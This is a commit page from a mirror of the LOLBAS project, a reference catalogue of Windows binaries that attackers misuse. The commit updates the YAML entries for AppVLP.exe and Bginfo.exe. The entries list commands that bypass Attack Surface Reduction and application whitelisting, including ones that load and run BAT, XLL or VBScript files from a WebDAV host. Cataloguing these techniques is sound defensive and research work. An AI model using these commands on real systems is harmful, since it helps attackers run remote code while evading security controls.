mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-25 14:29:24 +01:00
Updated yml for: appvlp and bginfo.
This commit is contained in:
parent
3266cb4d46
commit
95dc80b8cd
@ -5,6 +5,7 @@ Author: ''
|
||||
Created: '2018-05-25'
|
||||
Commands:
|
||||
- Command: AppVLP.exe \\webdav\calc.bat
|
||||
Usecase: Execution of BAT file hosted on Webdav server.
|
||||
Description: Executes calc.bat through AppVLP.exe
|
||||
Categories: ['Execution', 'ASR Bypass']
|
||||
Privileges: User
|
||||
@ -12,6 +13,7 @@ Commands:
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows 10 w/Office 2016
|
||||
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
|
||||
Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
|
||||
Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
|
||||
Categories: ['Execution', 'ASR Bypass']
|
||||
Privileges: User
|
||||
@ -19,6 +21,7 @@ Commands:
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows 10 w/Office 2016
|
||||
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
|
||||
Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
|
||||
Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
|
||||
Categories: ['Execution', 'ASR Bypass']
|
||||
Privileges: User
|
||||
@ -37,8 +40,8 @@ Resources:
|
||||
- https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/
|
||||
Acknowledgement:
|
||||
- Person: fab
|
||||
Handle: @0rbz_
|
||||
Handle: '@0rbz_'
|
||||
- Person: Will
|
||||
Handle: @moo_hax
|
||||
Handle: '@moo_hax'
|
||||
- Person: Matt Wilson
|
||||
Handle: @enigma0x3
|
||||
Handle: '@enigma0x3'
|
||||
|
@ -1,20 +1,39 @@
|
||||
---
|
||||
Name: Bginfo.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Description: Background Information Utility included with SysInternals Suite
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: bginfo.exe bginfo.bgi /popup /nolicprompt
|
||||
Description: Execute VBscript code that is referenced within the bginfo.bgi file.
|
||||
Usecase: Local execution of VBScript
|
||||
Categories: ['Execution', 'AWL Bypass']
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
- Command: '"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt'
|
||||
Usecase: Remote execution of VBScript
|
||||
Description: Execute bginfo.exe from a WebDAV server.
|
||||
Categories: ['Execution', 'AWL Bypass']
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
- Command: '"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt'
|
||||
Usecase: Remote execution of VBScript
|
||||
Description: This style of execution may not longer work due to patch.
|
||||
Categories: ['Execution', 'AWL Bypass']
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
Full Path:
|
||||
- No fixed path
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
|
||||
Notes: Thanks to Oddvar Moe - @oddvarmoe
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
|
Loading…
Reference in New Issue
Block a user